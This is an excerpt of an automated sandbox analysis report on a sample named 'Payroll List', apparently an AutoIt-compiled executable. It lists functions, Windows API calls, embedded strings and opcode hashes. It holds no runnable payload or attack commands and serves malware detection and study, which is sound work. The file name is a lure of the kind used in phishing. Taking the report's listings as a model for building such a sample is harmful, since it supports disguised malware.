                                                                    • Instruction Fuzzy Hash: CCC1A1322091930ADF6E463AC47443EBAA15BA2BB571B077DD4B3CB4E5EF20D525E620
                                                                    Function 0013FA57 Relevance: .3, Instructions: 323COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                    • Instruction ID: 6d339e84b3c610bd41c2611f035c98ad83efb5ff82ff1babd27f3cdb95de0dad
                                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                    • Instruction Fuzzy Hash: 90C1813260909309DF2D463AC47443EFAA15AA2BB1B1B177DD8B2CB5D5EF20C566D620
                                                                    Function 00D58468 Relevance: .1, Instructions: 92COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1435038315.0000000000D54000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D54000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d54000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                    • Instruction ID: b1df0543c30d9af8c6a034165d41835c5bbf986beababfac89cd761efe5a4667
                                                                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                    • Instruction Fuzzy Hash: 2441B571D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB50
                                                                    Function 00D58358 Relevance: .0, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1435038315.0000000000D54000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D54000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d54000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                    • Instruction ID: b20a7fbfc12b2db1460b68745e74b1d1f3b3bdf84790ed52f824821e44482f34
                                                                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                    • Instruction Fuzzy Hash: D4019D78A01209EFCB44DF98C5909AEF7B5FB48311F248699ED09A7301DB30AE41EB90
                                                                    Function 00D582F8 Relevance: .0, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1435038315.0000000000D54000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D54000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d54000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                    • Instruction ID: a9145df5f96b688e9a0ca513cacc737e6768bcc595ab87d57c4d107ffb9d5b09
                                                                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                    • Instruction Fuzzy Hash: AC019278A00209EFCB44DF98C5909AEF7B5FB48310F248599EC19A7701DB30AE41EB90
                                                                    Function 00D56CD8 Relevance: .0, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1435038315.0000000000D54000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D54000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d54000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                    Function 0017A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DeleteObject.GDI32(00000000), ref: 0017A2FE
                                                                    • DeleteObject.GDI32(00000000), ref: 0017A310
                                                                    • DestroyWindow.USER32 ref: 0017A31E
                                                                    • GetDesktopWindow.USER32 ref: 0017A338
                                                                    • GetWindowRect.USER32(00000000), ref: 0017A33F
                                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0017A480
                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0017A490
                                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017A4D8
                                                                    • GetClientRect.USER32(00000000,?), ref: 0017A4E4
                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0017A51E
                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017A540
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017A553
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017A55E
                                                                    • GlobalLock.KERNEL32(00000000), ref: 0017A567
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017A576
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0017A57F
                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017A586
                                                                    • GlobalFree.KERNEL32(00000000), ref: 0017A591
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017A5A3
                                                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,001AD9BC,00000000), ref: 0017A5B9
                                                                    • GlobalFree.KERNEL32(00000000), ref: 0017A5C9
                                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0017A5EF
                                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0017A60E
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017A630
                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017A81D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                    • API String ID: 2211948467-2373415609
                                                                    • Opcode ID: 151c939a556cbbc55899e3877f10cac8050274db27b40d4f2efc905222d94cbf
                                                                    • Instruction ID: cd115e7960a2a93a6e6ab73ee349b256813afa9811c0d4297c89dee796173d2e
                                                                    • Opcode Fuzzy Hash: 151c939a556cbbc55899e3877f10cac8050274db27b40d4f2efc905222d94cbf
                                                                    • Instruction Fuzzy Hash: 85027F71900254EFDB14DFA4DD89EAE7BB9FF49310F048158F90AAB6A0D7709D81CB61
                                                                    Function 0018D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetTextColor.GDI32(?,00000000), ref: 0018D2DB
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0018D30C
                                                                    • GetSysColor.USER32(0000000F), ref: 0018D318
                                                                    • SetBkColor.GDI32(?,000000FF), ref: 0018D332
                                                                    • SelectObject.GDI32(?,00000000), ref: 0018D341
                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0018D36C
                                                                    • GetSysColor.USER32(00000010), ref: 0018D374
                                                                    • CreateSolidBrush.GDI32(00000000), ref: 0018D37B
                                                                    • FrameRect.USER32(?,?,00000000), ref: 0018D38A
                                                                    • DeleteObject.GDI32(00000000), ref: 0018D391
                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0018D3DC
                                                                    • FillRect.USER32(?,?,00000000), ref: 0018D40E
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0018D439
                                                                      • Part of subcall function 0018D575: GetSysColor.USER32(00000012), ref: 0018D5AE
                                                                      • Part of subcall function 0018D575: SetTextColor.GDI32(?,?), ref: 0018D5B2
                                                                      • Part of subcall function 0018D575: GetSysColorBrush.USER32(0000000F), ref: 0018D5C8
                                                                      • Part of subcall function 0018D575: GetSysColor.USER32(0000000F), ref: 0018D5D3
                                                                      • Part of subcall function 0018D575: GetSysColor.USER32(00000011), ref: 0018D5F0
                                                                      • Part of subcall function 0018D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0018D5FE
                                                                      • Part of subcall function 0018D575: SelectObject.GDI32(?,00000000), ref: 0018D60F
                                                                      • Part of subcall function 0018D575: SetBkColor.GDI32(?,00000000), ref: 0018D618
                                                                      • Part of subcall function 0018D575: SelectObject.GDI32(?,?), ref: 0018D625
                                                                      • Part of subcall function 0018D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0018D644
                                                                      • Part of subcall function 0018D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0018D65B
                                                                      • Part of subcall function 0018D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0018D670
                                                                      • Part of subcall function 0018D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0018D698
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                    • String ID:
                                                                    • API String ID: 3521893082-0
                                                                    • Opcode ID: 64a5b5dd55fa74eea9f58bd87917ae26aa846dc71db11d792f80ccedb3e826a4
                                                                    • Instruction ID: f13bdd1ddbef8cf4a7e730f4152ad3ef4007609a9d674cfafcb294618f7fad68
                                                                    • Opcode Fuzzy Hash: 64a5b5dd55fa74eea9f58bd87917ae26aa846dc71db11d792f80ccedb3e826a4
                                                                    • Instruction Fuzzy Hash: 7A917E71408701BFC710AF64EC48E6BBBB9FB86325F100A19F962969E0D771D984CF52
                                                                    Function 0013B8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DestroyWindow.USER32 ref: 0013B98B
                                                                    • DeleteObject.GDI32(00000000), ref: 0013B9CD
                                                                    • DeleteObject.GDI32(00000000), ref: 0013B9D8
                                                                    • DestroyIcon.USER32(00000000), ref: 0013B9E3
                                                                    • DestroyWindow.USER32(00000000), ref: 0013B9EE
                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0019D2AA
                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0019D2E3
                                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0019D711
                                                                      • Part of subcall function 0013B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0013B759,?,00000000,?,?,?,?,0013B72B,00000000,?), ref: 0013BA58
                                                                    • SendMessageW.USER32 ref: 0019D758
                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0019D76F
                                                                    • ImageList_Destroy.COMCTL32(00000000), ref: 0019D785
                                                                    • ImageList_Destroy.COMCTL32(00000000), ref: 0019D790
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                    • String ID: 0
                                                                    • API String ID: 464785882-4108050209
                                                                    • Opcode ID: b07593bbd9f3d1d3d417a3434cc955f11213579cc281580a747090eb8fea1fdc
                                                                    • Instruction ID: e852589a9e33775459bd6b69f0ef4db72f4c58e66fe0d66bdf2ab3038b2db84a
                                                                    • Opcode Fuzzy Hash: b07593bbd9f3d1d3d417a3434cc955f11213579cc281580a747090eb8fea1fdc
                                                                    • Instruction Fuzzy Hash: 98129D70608601DFDB15CF28E884BA9BBF5FF15308F144569EA89CBA62D731EC85CB91
                                                                    Function 0016DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0016DBD6
                                                                    • GetDriveTypeW.KERNEL32(?,001BDC54,?,\\.\,001BDC00), ref: 0016DCC3
                                                                    • SetErrorMode.KERNEL32(00000000,001BDC54,?,\\.\,001BDC00), ref: 0016DE29
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$DriveType
                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                    • API String ID: 2907320926-4222207086
                                                                    • Opcode ID: e925c04ecfce34990ee9daa7bba5a7038954a827bb5074828e1f60e299e5f963
                                                                    • Instruction ID: 9fd23dd4fd3d5af97e1a37d6e573266268a2424cd6d74880c1fe9a0cd94a57ff
                                                                    • Opcode Fuzzy Hash: e925c04ecfce34990ee9daa7bba5a7038954a827bb5074828e1f60e299e5f963
                                                                    • Instruction Fuzzy Hash: 9851B130B08302ABC214EF68EC82C29B7A1FBA4745B11496BF467972D1DB71D975D783
                                                                    Function 0012CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsnicmp
                                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                    • API String ID: 1038674560-86951937
                                                                    • Opcode ID: 9dc0a6cbbe0c8ab9da5eaab74e0a22363b767d175b8ccbefcd110b835f6d1aed
                                                                    • Instruction ID: 2794814d7e2459c05cb05b4c208eecd89363cc82d543dfc019f4068610f02edf
                                                                    • Opcode Fuzzy Hash: 9dc0a6cbbe0c8ab9da5eaab74e0a22363b767d175b8ccbefcd110b835f6d1aed
                                                                    • Instruction Fuzzy Hash: D581FB31640229BBCB25ABA4EC82FBF7768EF74300F044029FA05A61C6E771D965C6D5
                                                                    Function 0018C6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0018C788
                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0018C83E
                                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 0018C859
                                                                    • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0018CB15
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window
                                                                    • String ID: 0
                                                                    • API String ID: 2326795674-4108050209
                                                                    • Opcode ID: 0afb41670ba0ec6fd6bc3a78e71a8a1dcd813ce06674cdc8725856d3c3359bc6
                                                                    • Instruction ID: 11809fea0039c64bd1745d8ab044c3a91646f4336b6667cebabb87f64a7e5fc3
                                                                    • Opcode Fuzzy Hash: 0afb41670ba0ec6fd6bc3a78e71a8a1dcd813ce06674cdc8725856d3c3359bc6
                                                                    • Instruction Fuzzy Hash: 69F10270104741AFE725AF24C885BAABBE4FF4A354F08062DF589D66A1D774CA84CFE1
                                                                    Function 0018638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?,001BDC00), ref: 00186449
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpper
                                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                    • API String ID: 3964851224-45149045
                                                                    • Opcode ID: 2c971e54be6492b74e5c3d9cd567d0736652b8d5b83159eb1654d579459e65c1
                                                                    • Instruction ID: 0d8472265db813b027831b1b392107f74ecc78302b7b412e37a1e7e324cd7fc1
                                                                    • Opcode Fuzzy Hash: 2c971e54be6492b74e5c3d9cd567d0736652b8d5b83159eb1654d579459e65c1
                                                                    • Instruction Fuzzy Hash: 1FC182302043458BCB04FF14D591A6E77E5AFA5344F144859F89A6B3E2EB30EE4ACF82
                                                                    Function 0018D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSysColor.USER32(00000012), ref: 0018D5AE
                                                                    • SetTextColor.GDI32(?,?), ref: 0018D5B2
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0018D5C8
                                                                    • GetSysColor.USER32(0000000F), ref: 0018D5D3
                                                                    • CreateSolidBrush.GDI32(?), ref: 0018D5D8
                                                                    • GetSysColor.USER32(00000011), ref: 0018D5F0
                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0018D5FE
                                                                    • SelectObject.GDI32(?,00000000), ref: 0018D60F
                                                                    • SetBkColor.GDI32(?,00000000), ref: 0018D618
                                                                    • SelectObject.GDI32(?,?), ref: 0018D625
                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0018D644
                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0018D65B
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0018D670
                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0018D698
                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0018D6BF
                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0018D6DD
                                                                    • DrawFocusRect.USER32(?,?), ref: 0018D6E8
                                                                    • GetSysColor.USER32(00000011), ref: 0018D6F6
                                                                    • SetTextColor.GDI32(?,00000000), ref: 0018D6FE
                                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0018D712
                                                                    • SelectObject.GDI32(?,0018D2A5), ref: 0018D729
                                                                    • DeleteObject.GDI32(?), ref: 0018D734
                                                                    • SelectObject.GDI32(?,?), ref: 0018D73A
                                                                    • DeleteObject.GDI32(?), ref: 0018D73F
                                                                    • SetTextColor.GDI32(?,?), ref: 0018D745
                                                                    • SetBkColor.GDI32(?,?), ref: 0018D74F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                    • String ID:
                                                                    • API String ID: 1996641542-0
                                                                    • Opcode ID: db1eedb7356e0f2fcfb1b857a5d9ef882335f42a61cab5a06dedd90067daaa5b
                                                                    • Instruction ID: 3baf0f1f7c0a905ea536068d9315d7ae9622f8b9e4b4b88551c144c4688c9381
                                                                    • Opcode Fuzzy Hash: db1eedb7356e0f2fcfb1b857a5d9ef882335f42a61cab5a06dedd90067daaa5b
                                                                    • Instruction Fuzzy Hash: 0D513B71900608BFDB10AFA8EC48EAE7B79EB09324F214515F916AB6E1D7719A80CF50
                                                                    Function 0018B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0018B7B0
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0018B7C1
                                                                    • CharNextW.USER32(0000014E), ref: 0018B7F0
                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0018B831
                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0018B847
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0018B858
                                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0018B875
                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 0018B8C7
                                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0018B8DD
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 0018B90E
                                                                    • _memset.LIBCMT ref: 0018B933
                                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0018B97C
                                                                    • _memset.LIBCMT ref: 0018B9DB
                                                                    • SendMessageW.USER32 ref: 0018BA05
                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 0018BA5D
                                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 0018BB0A
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0018BB2C
                                                                    • GetMenuItemInfoW.USER32(?), ref: 0018BB76
                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0018BBA3
                                                                    • DrawMenuBar.USER32(?), ref: 0018BBB2
                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 0018BBDA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
